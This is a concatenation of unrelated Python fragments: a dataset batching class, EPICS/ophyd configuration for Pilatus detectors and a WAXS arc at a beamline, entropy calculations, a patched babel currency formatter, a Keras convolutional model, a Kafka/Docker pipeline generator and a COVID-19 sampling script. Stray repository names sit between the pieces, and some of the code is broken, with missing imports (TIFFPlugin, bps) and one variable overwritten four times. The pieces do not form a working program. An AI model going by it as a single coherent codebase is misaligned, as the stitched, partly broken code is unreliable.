""" # All columns are visible self.visible_columns = self.all_columns def batch(self, batch_size: int = 32, drop_last_batch: bool = False): """Batch the dataset. Args: batch_size: integer batch size drop_last_batch: drop the last batch if its smaller than batch_size Returns: batches of data """ for i in range(0, len(self), batch_size): if drop_last_batch and i + batch_size > len(self): continue yield self[i : i + batch_size] @classmethod def from_batch(cls, batch: Batch): """Create an AbstractDataset from a batch.""" return cls(batch) @classmethod def from_batches(cls, batches: List[Batch]): """Create an AbstractDataset from a list of batches.""" return cls.from_batch( tz.merge_with(tz.compose(list, tz.concat), *batches), ) def _example_or_batch_to_batch( self, example_or_batch: Union[Example, Batch] ) -> Batch: # Check if example_or_batch is a batch is_batch = all( [isinstance(v, List) for v in example_or_batch.values()] ) and self._columns_all_equal_length(example_or_batch) # Convert to a batch if not if not is_batch: batch = {k: [v] for k, v in example_or_batch.items()} else: batch = example_or_batch return batch @classmethod def _merge_batch_and_output(cls, batch: Batch, output: Batch): """Merge an output during .map() into a batch.""" combined = batch for k in output.keys(): if k not in batch: combined[k] = output[k] else: if isinstance(batch[k][0], dict) and isinstance(output[k][0], dict): combined[k] = [ recmerge(b_i, o_i) for b_i, o_i in zip(batch[k], output[k]) ] else: combined[k] = output[k] return combined @classmethod def _mask_batch(cls, batch: Batch, boolean_mask: List[bool]): """Remove elements in `batch` that are masked by `boolean_mask`.""" return { k: [e for i, e in enumerate(v) if boolean_mask[i]] for k, v in batch.items() } def _inspect_function( self, function: Callable, with_indices: bool = False, batched: bool = False, ) -> SimpleNamespace: # Initialize variables to track no_output = dict_output = bool_output = list_output = False # If dict_output = True and `function` is used for updating the dataset # useful to know if any existing column is modified updates_existing_column = True existing_columns_updated = [] # Run the function to test it if batched: if with_indices: output = function(self[:2], range(2)) else: output = function(self[:2]) else: if with_indices: output = function(self[0], 0) else: output = function(self[0]) if isinstance(output, Mapping): # `function` returns a dict output dict_output = True # Set of columns that are updated existing_columns_updated = set(self.all_columns).intersection( set(output.keys()) ) # Check if `function` updates an existing column if len(existing_columns_updated) == 0: updates_existing_column = False elif output is None: # `function` returns None no_output = True elif isinstance(output, bool): # `function` returns a bool bool_output = True elif isinstance(output, list): # `function` returns a list list_output = True if batched and isinstance(output[0], bool): # `function` returns a bool per example bool_output = True return SimpleNamespace( dict_output=dict_output, no_output=no_output, bool_output=bool_output, list_output=list_output, updates_existing_column=updates_existing_column, existing_columns_updated=existing_columns_updated, ) @abc.abstractmethod def append( self, example_or_batch: Union[Example, Batch], ) -> None: """Append a batch of data to the dataset. `batch` must have the same columns as the dataset (regardless of what columns are visible). 
""" raise NotImplementedError dependencies.py def show_dependencies(): print('''requests countryinfo wikipedia pyttsx3 datetime ephem translate webbrowser pyperclip pillow''') print(f'Loading {__file__}') from ophyd import ( Component as Cpt, ADComponent, Device, PseudoPositioner, EpicsSignal, EpicsSignalRO, EpicsMotor, ROIPlugin, ImagePlugin, TransformPlugin, SingleTrigger, PilatusDetector, OverlayPlugin, FilePlugin) from ophyd.areadetector.filestore_mixins import FileStoreTIFFIterativeWrite from ophyd.areadetector.cam import PilatusDetectorCam from ophyd.areadetector.detectors import PilatusDetector from ophyd.areadetector.base import EpicsSignalWithRBV as SignalWithRBV from ophyd.utils import set_and_wait from databroker.assets.handlers_base import HandlerBase import os import bluesky.plans as bp import time from nslsii.ad33 import StatsPluginV33 from nslsii.ad33 import SingleTriggerV33 import pandas as pds class PilatusDetectorCamV33(PilatusDetectorCam): '''This is used to update the Pilatus to AD33.''' wait_for_plugins = Cpt(EpicsSignal, 'WaitForPlugins', string=True, kind='config') def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.stage_sigs['wait_for_plugins'] = 'Yes' def ensure_nonblocking(self): self.stage_sigs['wait_for_plugins'] = 'Yes' for c in self.parent.component_names: cpt = getattr(self.parent, c) if cpt is self: continue if hasattr(cpt, 'ensure_nonblocking'): cpt.ensure_nonblocking() file_path = Cpt(SignalWithRBV, 'FilePath', string=True) file_name = Cpt(SignalWithRBV, 'FileName', string=True) file_template = Cpt(SignalWithRBV, 'FileName', string=True) file_number = Cpt(SignalWithRBV, 'FileNumber') class PilatusDetector(PilatusDetector): cam = Cpt(PilatusDetectorCamV33, 'cam1:') class TIFFPluginWithFileStore(TIFFPlugin, FileStoreTIFFIterativeWrite): ... class Pilatus(SingleTriggerV33, PilatusDetector): tiff = Cpt(TIFFPluginWithFileStore, suffix="TIFF1:", #write_path_template="/GPFS/xf12id1/data/PLACEHOLDER", # override this on instances using instance.tiff.write_file_path write_path_template="/ramdisk/PLACEHOLDER", root='/') roi1 = Cpt(ROIPlugin, 'ROI1:') roi2 = Cpt(ROIPlugin, 'ROI2:') roi3 = Cpt(ROIPlugin, 'ROI3:') roi4 = Cpt(ROIPlugin, 'ROI4:') stats1 = Cpt(StatsPluginV33, 'Stats1:', read_attrs=['total']) stats2 = Cpt(StatsPluginV33, 'Stats2:', read_attrs=['total']) stats3 = Cpt(StatsPluginV33, 'Stats3:', read_attrs=['total']) stats4 = Cpt(StatsPluginV33, 'Stats4:', read_attrs=['total']) over1 = Cpt(OverlayPlugin, 'Over1:') trans1 = Cpt(TransformPlugin, 'Trans1:') threshold = Cpt(EpicsSignal, 'cam1:ThresholdEnergy') energy = Cpt(EpicsSignal, 'cam1:Energy') gain = Cpt(EpicsSignal, 'cam1:GainMenu') apply = Cpt(EpicsSignal, 'cam1:ThresholdApply') threshold_read = Cpt(EpicsSignal, 'cam1:ThresholdEnergy_RBV') energy_read = Cpt(EpicsSignal, 'cam1:Energy_RBV') gain_read = Cpt(EpicsSignal, 'cam1:GainMenu_RBV') apply_read = Cpt(EpicsSignal, 'cam1:ThresholdApply_RBV') def set_primary_roi(self, num): st = f'stats{num}' self.read_attrs = [st, 'tiff'] getattr(self, st).kind = 'hinted' def apply_threshold(self, energy=16.1, threshold=8.0, gain='autog'): if 1.5 < energy < 24: yield from bps.mv(self.energy, energy) else: raise ValueError("The energy range for Pilatus is 1.5 to 24 keV. The entered value is {}".format(energy)) if 1.5 < threshold < 24: yield from bps.mv(self.threshold, threshold) else: raise ValueError("The threshold range for Pilatus is 1.5 to 24 keV. 
The entered value is {}".format(threshold)) #That will need to be checked and tested if gain == 'autog': yield from bps.mv(self.gain, 1) elif gain == 'uhighg': yield from bps.mv(self.gain, 3) else: raise ValueError("The gain used is unknown. It shoul be either autog or uhighg") yield from bps.mv(self.apply, 1) def read_threshold(self): return self.energy_read, self.threshold_read, self.gain_read def det_exposure_time(exp_t, meas_t=1): pil1M.cam.acquire_time.put(exp_t) pil1M.cam.acquire_period.put(exp_t+0.001) pil1M.cam.num_images.put(int(meas_t/exp_t)) pil300KW.cam.acquire_time.put(exp_t) pil300KW.cam.acquire_period.put(exp_t+0.001) pil300KW.cam.num_images.put(int(meas_t/exp_t)) pil900KW.cam.acquire_time.put(exp_t) pil900KW.cam.acquire_period.put(exp_t+0.001) pil900KW.cam.num_images.put(int(meas_t/exp_t)) rayonix.cam.acquire_time.put(exp_t) rayonix.cam.acquire_period.put(exp_t+0.01) rayonix.cam.num_images.put(int(meas_t/exp_t)) #See if amptek is connected try: amptek.mca.preset_real_time.put(exp_t) except: print('amptek disconnected') def det_next_file (n): pil1M.cam.file_number.put(n) pil300KW.cam.file_number.put(n) rayonix.cam.file_number.put(n) class FakeDetector(Device): acq_time = Cpt(Signal, value=10) _default_configuration_attrs = ('acq_time', ) _default_read_attrs = () def trigger(self): st = self.st = DeviceStatus(self) from threading import Timer self.t = Timer(self.acq_time.get(), st._finished) self.t.start() return st fd = FakeDetector(name='fd') ##################################################### #Pilatus 1M definition pil1M = Pilatus("XF:12IDC-ES:2{Det:1M}", name="pil1M") #, detector_id="SAXS") pil1M.set_primary_roi(1) pil1M.tiff.write_path_template = '/nsls2/xf12id2/data/1M/images/%Y/%m/%d/' pil1M.tiff.read_path_template = '/nsls2/xf12id2/data/1M/images/%Y/%m/%d/' # pil1M.tiff.write_path_template = '/nsls2/data/smi/assets/default/%Y/%m/%d/' # pil1M.tiff.read_path_template = '/nsls2/data/smi/assets/default/%Y/%m/%d/' pil1mroi1 = EpicsSignal('XF:12IDC-ES:2{Det:1M}Stats1:Total_RBV', name='pil1mroi1') pil1mroi2 = EpicsSignal('XF:12IDC-ES:2{Det:1M}Stats2:Total_RBV', name='pil1mroi2') pil1mroi3 = EpicsSignal('XF:12IDC-ES:2{Det:1M}Stats3:Total_RBV', name='pil1mroi3') pil1mroi4 = EpicsSignal('XF:12IDC-ES:2{Det:1M}Stats4:Total_RBV', name='pil1mroi4') pil1M.stats1.kind = 'hinted' pil1M.stats1.total.kind = 'hinted' pil1M.cam.num_images.kind = 'config' pil1M.cam.ensure_nonblocking() class PIL1MPositions(Device): x = Cpt(EpicsMotor, 'X}Mtr') y = Cpt(EpicsMotor, 'Y}Mtr') z = Cpt(EpicsMotor, 'Z}Mtr') pil1m_pos = PIL1MPositions('XF:12IDC-ES:2{Det:1M-Ax:', name='detector_saxs_pos') for detpos in [pil1m_pos]: detpos.configuration_attrs = detpos.read_attrs ##################################################### #Pilatus 300kw definition pil300KW = Pilatus("XF:12IDC-ES:2{Det:300KW}", name="pil300KW") #, detector_id="WAXS") pil300KW.set_primary_roi(1) pil300KW.tiff.write_path_template = '/nsls2/xf12id2/data/300KW/images/%Y/%m/%d/' pil300KW.tiff.read_path_template = '/nsls2/xf12id2/data/300KW/images/%Y/%m/%d/' # pil300KW.tiff.write_path_template = '/nsls2/data/smi/assets/default/%Y/%m/%d/' # pil300KW.tiff.read_path_template = '/nsls2/data/smi/assets/default/%Y/%m/%d/' pil300kwroi1 = EpicsSignal('XF:12IDC-ES:2{Det:300KW}Stats1:Total_RBV', name='pil300kwroi1') pil300kwroi2 = EpicsSignal('XF:12IDC-ES:2{Det:300KW}Stats2:Total_RBV', name='pil300kwroi2') pil300kwroi3 = EpicsSignal('XF:12IDC-ES:2{Det:300KW}Stats3:Total_RBV', name='pil300kwroi3') pil300kwroi4 = 
EpicsSignal('XF:12IDC-ES:2{Det:300KW}Stats4:Total_RBV', name='pil300kwroi4') pil300KW.stats1.kind = 'hinted' pil300KW.stats1.total.kind = 'hinted' pil300KW.cam.num_images.kind = 'config' pil300KW.cam.ensure_nonblocking() ##################################################### #Pilatus 900KW definition pil900KW = Pilatus("XF:12IDC-ES:2{Det:900KW}", name="pil900KW") pil900KW.set_primary_roi(1) pil900KW.tiff.write_path_template = '/nsls2/xf12id2/data/1M/images/%Y/%m/%d/' pil900KW.tiff.read_path_template = '/nsls2/xf12id2/data/1M/images/%Y/%m/%d/' # pil900KW.tiff.write_path_template = '/nsls2/data/smi/assets/default/%Y/%m/%d/' # pil900KW.tiff.read_path_template = '/nsls2/data/smi/assets/default/%Y/%m/%d/' pil900kwroi1 = EpicsSignal('XF:12IDC-ES:2{Det:900KW}Stats1:Total_RBV', name='pil900kwroi1') pil900kwroi1 = EpicsSignal('XF:12IDC-ES:2{Det:900KW}Stats2:Total_RBV', name='pil900kwroi2') pil900kwroi1 = EpicsSignal('XF:12IDC-ES:2{Det:900KW}Stats3:Total_RBV', name='pil900kwroi3') pil900kwroi1 = EpicsSignal('XF:12IDC-ES:2{Det:900KW}Stats4:Total_RBV', name='pil900kwroi4') pil900KW.stats1.kind = 'hinted' pil900KW.stats1.total.kind = 'hinted' pil900KW.cam.num_images.kind = 'config' pil900KW.cam.ensure_nonblocking() #"multi_count" plan is dedicated to the time resolved Pilatus runs when the number of images in area detector is more than 1 def multi_count(detectors, *args, **kwargs): delay = detectors[0].cam.num_images.get() * detectors[0].cam.acquire_time.get() + 1 yield from bp.count(detectors, *args, delay=delay, **kwargs) class WAXS(Device): arc = Cpt(EpicsMotor, 'WAXS:1-Ax:Arc}Mtr') bs_x = Cpt(EpicsMotor, 'MCS:1-Ax:5}Mtr') bs_y = Cpt(EpicsMotor, 'BS:WAXS-Ax:y}Mtr') def set(self, arc_value): st_arc = self.arc.set(arc_value) if self.arc.limits[0] <= arc_value <= 10.61: calc_value = self.calc_waxs_bsx(arc_value) elif 10.61 <= arc_value <=13: raise ValueError("The waxs detector cannot be moved to {} deg until the new beamstop is mounted".format(arc_value)) else: calc_value = -40 st_x = self.bs_x.set(calc_value) return st_arc & st_x def calc_waxs_bsx(self, arc_value): # bsx_pos =-20.92 + 264 * np.tan(np.deg2rad(arc_value)) bsx_pos = 13.8 + 252*np.tan(np.deg2rad(arc_value)) return bsx_pos waxs = WAXS('XF:12IDC-ES:2{', name='waxs') import numpy as np from scipy.stats import entropy from math import log, e import pandas as pd import timeit def entropy1(labels, base=None): value,counts = np.unique(labels, return_counts=True) return entropy(counts, base=base) def entropy2(labels, base=None): """ Computes entropy of label distribution. """ n_labels = len(labels) if n_labels <= 1: return 0 value,counts = np.unique(labels, return_counts=True) probs = counts / n_labels n_classes = np.count_nonzero(probs) if n_classes <= 1: return 0 ent = 0. # Compute entropy base = e if base is None else base for i in probs: ent -= i * log(i, base) return ent def entropy3(labels, base=None): vc = pd.Series(labels).value_counts(normalize=True, sort=False) base = e if base is None else base return -(vc * np.log(vc)/np.log(base)).sum() def entropy4(labels, base=None): value,counts = np.unique(labels, return_counts=True) norm_counts = counts / counts.sum() base = e if base is None else base return -(norm_counts * np.log(norm_counts)/np.log(base)).sum() labels = [1,3,5,2,3,5,3,2,1,3,4,5] print(entropy1(labels)) print(entropy2(labels)) print(entropy3(labels)) print(entropy4(labels))""" pricing.babel_numbers ~~~~~~~~~~~~~~~~ Custom patches babel.numbers with improved `format_currency` function. :copyright: (c) 2018 by . 
:license: MIT, see LICENSE for more details. """ import decimal import babel.numbers from babel.core import Locale from babel.numbers import NumberPattern as _NumberPattern from babel.numbers import LC_NUMERIC, number_re, UnknownCurrencyFormatError __all__ = ['format_currency'] def format_currency(number, currency, format=None, locale=LC_NUMERIC, currency_digits=True, format_type='standard', decimal_quantization=True): """Return formatted currency value. >>> format_currency(1099.98, 'USD', locale='en_US') u'$1,099.98' >>> format_currency(1099.98, 'USD', locale='es_CO') u'US$\\xa01.099,98' >>> format_currency(1099.98, 'EUR', locale='de_DE') u'1.099,98\\xa0\\u20ac' The format can also be specified explicitly. The currency is placed with the '¤' sign. As the sign gets repeated the format expands (¤ being the symbol, ¤¤ is the currency abbreviation and ¤¤¤ is the full name of the currency): >>> format_currency(1099.98, 'EUR', u'\xa4\xa4 #,##0.00', locale='en_US') u'EUR 1,099.98' >>> format_currency(1099.98, 'EUR', u'#,##0.00 \xa4\xa4\xa4', ... locale='en_US') u'1,099.98 euros' Currencies usually have a specific number of decimal digits. This function favours that information over the given format: >>> format_currency(1099.98, 'JPY', locale='en_US') u'\\xa51,100' >>> format_currency(1099.98, 'COP', u'#,##0.00', locale='es_ES') u'1.100' However, the number of decimal digits can be overriden from the currency information, by setting the last parameter to ``False``: >>> format_currency(1099.98, 'JPY', locale='en_US', currency_digits=False) u'\\xa51,099.98' >>> format_currency(1099.98, 'COP', u'#,##0.00', locale='es_ES', ... currency_digits=False) u'1.099,98' If a format is not specified the type of currency format to use from the locale can be specified: >>> format_currency(1099.98, 'EUR', locale='en_US', format_type='standard') u'\\u20ac1,099.98' When the given currency format type is not available, an exception is raised: >>> format_currency('1099.98', 'EUR', locale='root', format_type='unknown') Traceback (most recent call last): ... UnknownCurrencyFormatError: "'unknown' is not a known currency format type" By default the locale is allowed to truncate and round a high-precision number by forcing its format pattern onto the decimal part. You can bypass this behavior with the `decimal_quantization` parameter: >>> format_currency(1099.9876, 'USD', locale='en_US') u'$1,099.99' >>> format_currency(1099.9876, 'USD', locale='en_US', ... decimal_quantization=False) u'$1,099.9876' :param number: the number to format :param currency: the currency code :param format: the format string to use :param locale: the `Locale` object or locale identifier :param currency_digits: use the currency's natural number of decimal digits :param format_type: the currency format type to use :param decimal_quantization: Truncate and round high-precision numbers to the format pattern. Defaults to `True`. 
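    :return: the formatted currency value as a string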
""" locale = Locale.parse(locale) if format: pattern = parse_pattern(format) else: try: p = locale.currency_formats[format_type] pattern = NumberPattern( p.pattern, p.prefix, p.suffix, p.grouping, p.int_prec, p.frac_prec, p.exp_prec, p.exp_plus) except KeyError: raise UnknownCurrencyFormatError( "%r is not a known currency format type" % format_type) return pattern.apply( number, locale, currency=currency, currency_digits=currency_digits, decimal_quantization=decimal_quantization) def parse_pattern(pattern): """Parse number format patterns""" if isinstance(pattern, NumberPattern): return pattern def _match_number(pattern): rv = number_re.search(pattern) if rv is None: raise ValueError('Invalid number pattern %r' % pattern) return rv.groups() pos_pattern = pattern # Do we have a negative subpattern? if ';' in pattern: pos_pattern, neg_pattern = pattern.split(';', 1) pos_prefix, number, pos_suffix = _match_number(pos_pattern) neg_prefix, _, neg_suffix = _match_number(neg_pattern) else: pos_prefix, number, pos_suffix = _match_number(pos_pattern) neg_prefix = '-' + pos_prefix neg_suffix = pos_suffix if 'E' in number: number, exp = number.split('E', 1) else: exp = None if '@' in number: if '.' in number and '0' in number: raise ValueError('Significant digit patterns can not contain ' '"@" or "0"') if '.' in number: integer, fraction = number.rsplit('.', 1) else: integer = number fraction = '' def parse_precision(p): """Calculate the min and max allowed digits""" min = max = 0 for c in p: if c in '@0': min += 1 max += 1 elif c == '#': max += 1 elif c == ',': continue else: break return min, max int_prec = parse_precision(integer) frac_prec = parse_precision(fraction) if exp: exp_plus = exp.startswith('+') exp = exp.lstrip('+') exp_prec = parse_precision(exp) else: exp_plus = None exp_prec = None grouping = babel.numbers.parse_grouping(integer) return NumberPattern(pattern, (pos_prefix, neg_prefix), (pos_suffix, neg_suffix), grouping, int_prec, frac_prec, exp_prec, exp_plus) class NumberPattern(_NumberPattern): """Overriding babel.numbers.NumberPattern.apply to newer version.""" def apply( self, value, locale, currency=None, currency_digits=True, decimal_quantization=True): """Renders into a string a number following the defined pattern. Forced decimal quantization is active by default so we'll produce a number string that is strictly following CLDR pattern definitions. """ if not isinstance(value, decimal.Decimal): value = decimal.Decimal(str(value)) value = value.scaleb(self.scale) # Separate the absolute value from its sign. is_negative = int(value.is_signed()) value = abs(value).normalize() # Prepare scientific notation metadata. if self.exp_prec: value, exp, exp_sign = self.scientific_notation_elements( value, locale) # Adjust the precision of the fractionnal part and force it to the # currency's if neccessary. frac_prec = self.frac_prec if currency and currency_digits: frac_prec = (babel.numbers.get_currency_precision(currency), ) * 2 # Bump decimal precision to the natural precision of the number if it # exceeds the one we're about to use. This adaptative precision is only # triggered if the decimal quantization is disabled or if a scientific # notation pattern has a missing mandatory fractional part (as in the # default '#E0' pattern). 
This special case has been extensively # discussed at # https://github.com/python-babel/babel/pull/494#issuecomment-307649969 if not decimal_quantization or (self.exp_prec and frac_prec == (0, 0)): frac_prec = (frac_prec[0], max([frac_prec[1], get_decimal_precision(value)])) # Render scientific notation. if self.exp_prec: number = ''.join([ self._quantize_value(value, locale, frac_prec), babel.numbers.get_exponential_symbol(locale), exp_sign, self._format_int( str(exp), self.exp_prec[0], self.exp_prec[1], locale)]) # Is it a siginificant digits pattern? elif '@' in self.pattern: text = self._format_significant(value, self.int_prec[0], self.int_prec[1]) a, sep, b = text.partition(".") number = self._format_int(a, 0, 1000, locale) if sep: number += babel.numbers.get_decimal_symbol(locale) + b # A normal number pattern. else: number = self._quantize_value(value, locale, frac_prec) retval = ''.join([ self.prefix[is_negative], number, self.suffix[is_negative]]) if u'¤' in retval: retval = retval.replace(u'¤¤¤', babel.numbers.get_currency_name( currency, value, locale)) retval = retval.replace(u'¤¤', currency.upper()) retval = retval.replace(u'¤', babel.numbers.get_currency_symbol( currency, locale)) return retval def _quantize_value(self, value, locale, frac_prec): quantum = get_decimal_quantum(frac_prec[1]) rounded = value.quantize(quantum) a, sep, b = str(rounded).partition(".") number = (self._format_int(a, self.int_prec[0], self.int_prec[1], locale) + self._format_frac(b or '0', locale, frac_prec)) return number def scientific_notation_elements(self, value, locale): """ Returns normalized scientific notation components of a value.""" # Normalize value to only have one lead digit. exp = value.adjusted() value = value * get_decimal_quantum(exp) assert value.adjusted() == 0 # Shift exponent and value by the minimum number of leading digits # imposed by the rendering pattern. And always make that number # greater or equal to 1. lead_shift = max([1, min(self.int_prec)]) - 1 exp = exp - lead_shift value = value * get_decimal_quantum(-lead_shift) # Get exponent sign symbol. exp_sign = '' if exp < 0: exp_sign = babel.numbers.get_minus_sign_symbol(locale) elif self.exp_plus: exp_sign = babel.numbers.get_plus_sign_symbol(locale) # Normalize exponent value now that we have the sign. exp = abs(exp) return value, exp, exp_sign def get_decimal_quantum(precision): """Return minimal quantum of a number, as defined by precision.""" assert isinstance(precision, (int, decimal.Decimal)) return decimal.Decimal(10) ** (-precision) def get_decimal_precision(number): """Return maximum precision of a decimal instance's fractional part. Precision is extracted from the fractional part only. 
""" # Copied from: https://github.com/mahmoud/boltons/pull/59 assert isinstance(number, decimal.Decimal) decimal_tuple = number.normalize().as_tuple() if decimal_tuple.exponent >= 0: return 0 return abs(decimal_tuple.exponent) mirgee/thesis_project0 import keras as k import numpy as np import tensorflow as tf def temp_model( imsize=256, n_classes=2, input_time_length=256, final_conv_length='auto', n_filters_1=25, filter_length_1=10, n_filters_2=50, filter_length_2=5, n_filters_3=100, filter_length_3=5, n_filters_4=200, filter_length_4=5, pool_length=3, pool_stride=3, first_nonlin=k.activations.relu, first_pool_mode='max', first_pool_nonlin=(lambda x: x), later_nonlin=k.activations.relu, later_pool_mode='max', later_pool_nonlin=(lambda x: x), drop_prob=0.5, batch_norm=True, batch_norm_alpha=0.1, stride_before_pool=False, ): if stride_before_pool: conv_stride = pool_stride pool_stride = 1 else: conv_stride = 1 pool_stride = pool_stride pool_class_dict = dict(max=k.layers.MaxPool2D, mean=k.layers.AvgPool2D) # AvgPool2dWithConv) first_pool_class = pool_class_dict[first_pool_mode] later_pool_class = pool_class_dict[later_pool_mode] inp = k.layers.Input((imsize, imsize, 1), name='input') layer = k.layers.Conv2D( filters=n_filters_1, kernel_size=(filter_length_1, filter_length_1), use_bias=not batch_norm, kernel_initializer=k.initializers.glorot_uniform(), bias_initializer='zeros', data_format='channels_last', input_shape=(imsize, imsize, 1), name='conv_1' )(inp) if batch_norm: layer = k.layers.BatchNormalization( axis=-1, momentum=batch_norm_alpha, epsilon=1e-5, name='batch_norm_1', )(layer) layer = k.layers.Activation(first_nonlin, name='nonlin_1')(layer) layer = first_pool_class( pool_size=(pool_length, pool_length), strides=(pool_stride, pool_stride), name='pool_1' )(layer) layer = k.layers.Lambda(first_pool_nonlin, name='pool_nonlin_1')(layer) def add_conv_pool_block(layer, n_filters, filter_length, block_nr): suff = '_{:d}'.format(block_nr) layer = k.layers.Dropout(drop_prob, name='drop'+suff)(layer) layer = k.layers.Conv2D( filters=n_filters, kernel_size=(filter_length, filter_length), # Not sure strides=(conv_stride, conv_stride), # Not sure use_bias=not batch_norm, kernel_initializer=k.initializers.glorot_uniform(), bias_initializer='zeros', name='conv'+suff )(layer) if batch_norm: layer = k.layers.BatchNormalization( axis=-1, momentum=batch_norm_alpha, epsilon=1e-5, name='batch_norm'+suff, # There are other default params which may be diff. from orig. 
)(layer) layer = k.layers.Activation(later_nonlin, name='nonlin'+suff)(layer) layer = later_pool_class( pool_size=(pool_length, pool_length), strides=(pool_stride, pool_stride), name='pool'+suff )(layer) layer = k.layers.Lambda(later_pool_nonlin, name='pool_nonlin'+suff)(layer) return layer layer = add_conv_pool_block(layer, n_filters_2, filter_length_2, 2) layer = add_conv_pool_block(layer, n_filters_3, filter_length_3, 3) layer = add_conv_pool_block(layer, n_filters_4, filter_length_4, 4) # layer = add_conv_pool_block(layer, n_filters_5, filter_length_5, 5) # layer = k.layers.Flatten()(layer) # layer = k.layers.Dense(32, activation='elu')(layer) # # layer = k.layers.Dense(n_classes, activation='softmax')(layer) if final_conv_length == 'auto': final_conv_length = int(layer.shape[2]) layer = k.layers.Conv2D( filters=n_classes, kernel_size=(final_conv_length, final_conv_length), use_bias=True, activation= 'softmax', kernel_initializer=k.initializers.glorot_uniform(), bias_initializer='zeros', name='conv_classifier' )(layer) # layer = k.layers.Softmax(axis=-1, name='softmax')(layer) layer = k.layers.Lambda(lambda x: x[:,0,0,:], name='squeeze')(layer) model = k.models.Model(inp, layer) # model.compile( # optimizer=k.optimizers.SGD(lr=0.001, momentum=0.99, decay=1e-5, nesterov=True), # loss=k.losses.binary_crossentropy, # metrics=['accuracy'], # loss_weights=None, # sample_weight_mode=None, # weighted_metrics=None, # target_tensors=None # ) return model utils extention (getData func).py0 def getData(): dataset = pd.read_csv('FUTURES MINUTE.txt', header = None) dataset.columns = ['Date','time',"1. open","2. high",'3. low','4. close','5. volume'] dataset['date'] = dataset['Date'] +" "+ dataset['time'] dataset.drop('Date', axis=1, inplace=True) dataset.drop('time', axis=1, inplace=True) dataset['date'] = dataset['date'].apply(lambda x: pd.to_datetime(x, errors='ignore')) dataset['date'] = dataset['date'].apply(lambda x: datetime.datetime.strftime(x, '%Y-%m-%d %H:%M:%S')) dataset.set_index(dataset.index.map(lambda x: pd.to_datetime(x, errors='ignore'))) dataset.set_index('date',inplace=True) return dataset import os import json from pathlib import Path """ Example: Pipeline( id = 'test-id', nodes = { Node( id = 'node1', path = './module1', params = {}, inputs = [], outputs = ['node2'] ), Node( id = 'node2', path = './module2', params = {}, inputs = ['node1'], outputs = [] ), } ) """ class Pipeline2(object): def __init__(self, id, nodes=[]): self.id = id self.nodes = nodes self.tab_size = 2 def __tabs(self, count): tab = ''.join([' ' for _ in range(self.tab_size)]) return ''.join([tab for _ in range(count)]) def __parse_settings(self, path): # Default settings settings = { 'use_custom_dockerfile': False } path = str(path.parent) if os.path.exists(path + "/settings.txt"): with open(path + "/settings.txt", 'r') as f: line = f.readline().strip() while line: pair = line.split("=") if pair[0].strip() == "use_custom_dockerfile": settings['use_custom_dockerfile'] = bool(pair[1].lower().strip()) line = f.readline().strip() return settings def __export_params(self, node, path): params = node.params if "topics_in" not in params: params["topics_in"] = [i + "-" + node.id for i in node.inputs] if "topics_out" not in params: params["topics_out"] = [node.id + "-" + o for o in node.outputs] if "servers_in" not in params: params["servers_in"] = "kafka0:29092" if "servers_out" not in params: params["servers_out"] = "kafka0:29092" if "session_timeout_ms" not in params: params["session_timeout_ms"] = 10000 if 
"auto_offset_reset" not in params: params["auto_offset_reset"] = "earliest" if "group_id" not in params: params["group_id"] = self.id path = str(path.parent) with open(path + "/params.json", 'w') as f: json.dump(params, f) def __generate_dockerfile(self, path): with open(str(path.parent) + "/Dockerfile", 'w') as f: f.write("FROM ubuntu:latest\n") f.write("\n") f.write("RUN apt-get update\n") f.write("RUN apt-get install -y python3.7 python3-pip python3-dev\n") f.write("RUN apt-get install -y git\n") f.write("RUN pip3 install --upgrade pip\n") f.write("\n") f.write("WORKDIR /usr/src/app\n") f.write("COPY . .\n") f.write("RUN pip3 install -r requirements.txt\n") # I'm not sure why it isn't upgrading. uninstall -> reinstall is the temporary fix f.write("RUN pip3 uninstall hummingbird\n") f.write("RUN pip3 install --upgrade git+https://github.com/richardycao/hummingbird_python.git#egg=hummingbird\n") f.write("\n") f.write("CMD python3 " + path.name) def __generate_docker_compose(self, path): with open('./docker-compose-' + str(self.id) + '.yml', 'w') as f: f.write("version: '3.7'\n") f.write("\n") f.write("services:\n") for node in reversed(self.nodes): path = Path(node.path) container_name = node.id f.write(self.__tabs(1) + container_name + ":\n") f.write(self.__tabs(2) + "build: " + str(path.parent) + "\n") f.write(self.__tabs(2) + "container_name: " + container_name + "\n") f.write(self.__tabs(2) + "environment:\n") f.write(self.__tabs(3) + "- \"PYTHONUNBUFFERED=1\"\n") if len(node.outputs) > 0: f.write(self.__tabs(2) + "depends_on:\n") for output_id in node.outputs: f.write(self.__tabs(3) + "- " + output_id + "\n") def build(self): for node in self.nodes: path = Path(node.path) settings = self.__parse_settings(path) # Does this work if there isn't a settings file? self.__export_params(node, path) if not settings['use_custom_dockerfile']: self.__generate_dockerfile(path) self.__generate_docker_compose(path) os.system('docker-compose -f docker-compose-kafka.yml build') os.system('docker-compose -f docker-compose-' + str(self.id) + '.yml build') def run(self): # Maybe this part should be done manually. Leave it blank for now. # Run Kafka docker # Wait # Run pipeline docker pass # -*- coding: utf-8 -*- import itertools as it import pickle as pkl import os from collections import OrderedDict from sampling_utils import * from shared_utils import * disease = "covid19" nums_sample = range(100) GID = int(os.environ["SGE_TASK_ID"]) num_sample = nums_sample[GID - 1] filename = "../data/ia_effect_samples/{}_{}.pkl".format(disease, num_sample) print("Running task {} - disease: {} - sample: {}\nWill create file {}".format(GID, disease, num_sample, filename)) with open('../data/counties/counties.pkl', "rb") as f: counties = pkl.load(f) prediction_region = "germany" parameters = OrderedDict() # Load data data = load_daily_data(disease, prediction_region, counties) # samples random times --> check the data conversion carefully # check if correct times = uniform_times_by_day(data.index) locs = uniform_locations_by_county(counties) #NOTE: Do we want basis functions with a longer temporal horizon? 
def temporal_bfs(x): return bspline_bfs(x, np.array( [0, 0, 1, 2, 3, 4, 5]) * 24 * 3600.0, 2) def spatial_bfs(x): return [gaussian_bf(x, σ) for σ in [6.25, 12.5, 25.0, 50.0]] samp = IAEffectSampler(data, times, locs, temporal_bfs, spatial_bfs, num_tps=10, time_horizon=5) res = samp(data.index, data.columns) results = {"ia_effects": res, "predicted day": data.index, "predicted county": data.columns} with open(filename, "wb") as file: pkl.dump(results, file) 1-10 ''' Copyright 2011 Acknack Ltd Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' ''' Decorator to intercept exceptions and handle them nicely ''' import logging import friendlyCodes 